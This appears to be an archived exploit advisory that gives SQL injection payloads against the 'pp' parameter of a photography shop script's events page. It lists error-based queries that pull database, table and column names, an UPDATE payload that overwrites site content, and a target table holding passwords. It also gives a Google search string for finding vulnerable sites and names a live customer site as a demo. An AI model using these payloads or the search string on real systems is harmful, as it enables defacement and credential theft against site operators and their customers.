SecurityvulnsSECURITYVULNS:DOC:17879myphotographer image shop script /events/index.asp sql injection
myphotographer image shop script /events/index.asp sql injection
Credit : CodeXpLoder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam,Liz0ziM,eno7,3APA3A
Sourge site : http://www.myphotographer.com/support/
#####################################################
1-) example.com/[patch]/index.asp?ee=1559&pp=(sql methot)
1-) example.com/events/index.asp?ee=1559&pp=(sql methot)
2-) example.com/[patch]/index.asp?ee=1559&pp=(sql methot)
2-) example.com/events/index.asp?ee=1559&pp=(sql methot)
2-) example.com/events/index.asp?ee=1559&pp=1'
2-) example.com/events/index.asp?ee=1559&pp=1 having 1=1
2-) example.com/eventss/index.asp?ee=1559&pp=1,2,3,4,5
2-) example.com/events/index.asp?ee=1559&pp=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
2-) example.com/events/index.asp?ee=1559&pp=1 group by tbl.column having 1=1
#for db : convert(int, db_name(1)
: convert(int, db_name(2)
#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))
#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))
#tbl : tbl_photography_EventDB
#column : description,date,password,password_flag,Publish_Datecity
##########################################################
demo site: http://www.bygracephotography.myphotographer.com/events/description.asp?ee=2588&pp=194755
google search code : "All images are copyright protected by the photographer" inurl:"/events/index.asp?ee"
example site : http://www.bygracephotography.myphotographer.com/events/